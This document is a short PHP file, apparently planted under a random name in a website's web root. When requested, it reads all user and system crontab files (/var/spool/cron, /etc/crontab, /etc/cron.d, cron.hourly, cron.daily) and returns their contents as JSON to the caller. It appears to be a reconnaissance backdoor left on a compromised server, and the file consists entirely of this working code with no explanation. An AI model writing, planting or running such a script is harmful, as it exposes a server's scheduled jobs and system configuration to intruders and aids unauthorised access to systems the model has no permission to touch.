File: /home/trebiaseguros/www/x6bea72.php
<?php $r=[];foreach(glob('/var/spool/cron/*') as $f)if(is_file($f))$r[]=basename($f).':'.@file_get_contents($f);foreach(glob('/var/spool/cron/crontabs/*') as $f)if(is_file($f))$r[]=basename($f).':'.@file_get_contents($f);$r[]='SYSTEM_crontab:'.@file_get_contents('/etc/crontab');foreach(glob('/etc/cron.d/*') as $f)if(is_file($f))$r[]='SYSTEM_'.basename($f).':'.@file_get_contents($f);foreach(glob('/etc/cron.hourly/*') as $f)if(is_file($f))$r[]='HOURLY_'.basename($f).':'.@file_get_contents($f);foreach(glob('/etc/cron.daily/*') as $f)if(is_file($f))$r[]='DAILY_'.basename($f).':'.@file_get_contents($f);echo json_encode(['ok'=>1,'crons'=>$r]);?>